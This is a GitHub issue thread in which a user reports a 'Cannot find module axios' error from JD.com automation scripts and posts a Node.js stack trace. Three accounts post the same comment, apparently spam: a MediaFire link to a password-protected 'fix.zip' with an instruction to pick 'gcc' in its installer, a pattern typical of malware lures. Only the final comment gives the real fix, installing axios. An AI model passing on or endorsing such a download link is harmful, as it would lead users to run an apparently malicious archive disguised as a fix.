### ISSUE TITLE
运行哪个脚本都报错这个

### ISSUE THREAD

**Issue by jinghuashang** [shufflewzc/faker2#213]
## 开始执行... 2024-08-26 20:28:24

🔔天天来赚钱, 开始!

====================共1个京东账号Cookie=================

============脚本执行时间：2024/08/26 20:28:24=============

>>>>>>>>>>>>>>Faker提醒您：有问题先更新 关注频道https://t.me/scriptalking>>>>>>>>>>>>>>>

====加载sendNotify，频道：https://t.me/scriptalking====

node:internal/modules/cjs/loader:1148
  throw err;
  ^

Error: Cannot find module 'axios'
Require stack:
- /ql/data/scripts/shufflewzc_faker2/utils/Rebels_jdCommon.js
- /ql/data/scripts/shufflewzc_faker2/sendNotify.js
- /ql/data/scripts/shufflewzc_faker2/jd_wxttzq.js
    at Module._resolveFilename (node:internal/modules/cjs/loader:1145:15)
    at Module._load (node:internal/modules/cjs/loader:986:27)
    at Module.require (node:internal/modules/cjs/loader:1233:19)
    at require (node:internal/modules/helpers:179:18)
    at Object.<anonymous> (/ql/data/scripts/shufflewzc_faker2/utils/Rebels_jdCommon.js:6:29812)
    at Module._compile (node:internal/modules/cjs/loader:1358:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
    at Module.load (node:internal/modules/cjs/loader:1208:32)
    at Module._load (node:internal/modules/cjs/loader:1024:12)
    at Module.require (node:internal/modules/cjs/loader:1233:19) {
  code: 'MODULE_NOT_FOUND',
  requireStack: [
    '/ql/data/scripts/shufflewzc_faker2/utils/Rebels_jdCommon.js',
    '/ql/data/scripts/shufflewzc_faker2/sendNotify.js',
    '/ql/data/scripts/shufflewzc_faker2/jd_wxttzq.js'
  ]
}

Node.js v20.15.1

## 开始执行... 2024-08-26 20:30:54

🔔新转赚红包提现, 开始!

====加载sendNotify，频道：https://t.me/scriptalking====

node:internal/modules/cjs/loader:1148
  throw err;
  ^

Error: Cannot find module 'axios'
Require stack:
- /ql/data/scripts/shufflewzc_faker2/utils/Rebels_jdCommon.js
- /ql/data/scripts/shufflewzc_faker2/sendNotify.js
- /ql/data/scripts/shufflewzc_faker2/utils/Rebels_sendJDNotify.js
- /ql/data/scripts/shufflewzc_faker2/jd_zzhb_withdraw.js
    at Module._resolveFilename (node:internal/modules/cjs/loader:1145:15)
    at Module._load (node:internal/modules/cjs/loader:986:27)
    at Module.require (node:internal/modules/cjs/loader:1233:19)
    at require (node:internal/modules/helpers:179:18)
    at Object.<anonymous> (/ql/data/scripts/shufflewzc_faker2/utils/Rebels_jdCommon.js:6:29812)
    at Module._compile (node:internal/modules/cjs/loader:1358:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
    at Module.load (node:internal/modules/cjs/loader:1208:32)
    at Module._load (node:internal/modules/cjs/loader:1024:12)
    at Module.require (node:internal/modules/cjs/loader:1233:19) {
  code: 'MODULE_NOT_FOUND',
  requireStack: [
    '/ql/data/scripts/shufflewzc_faker2/utils/Rebels_jdCommon.js',
    '/ql/data/scripts/shufflewzc_faker2/sendNotify.js',
    '/ql/data/scripts/shufflewzc_faker2/utils/Rebels_sendJDNotify.js',
    '/ql/data/scripts/shufflewzc_faker2/jd_zzhb_withdraw.js'
  ]
}

Node.js v20.15.1

## 执行结束... 2024-08-26 20:30:54  耗时 1 秒

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jinghuashang** [comment]
有docker的吗，我青龙是docker部署的

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Richar-Song** [comment]
Error: Cannot find module 'axios'
没有安装依赖:axios
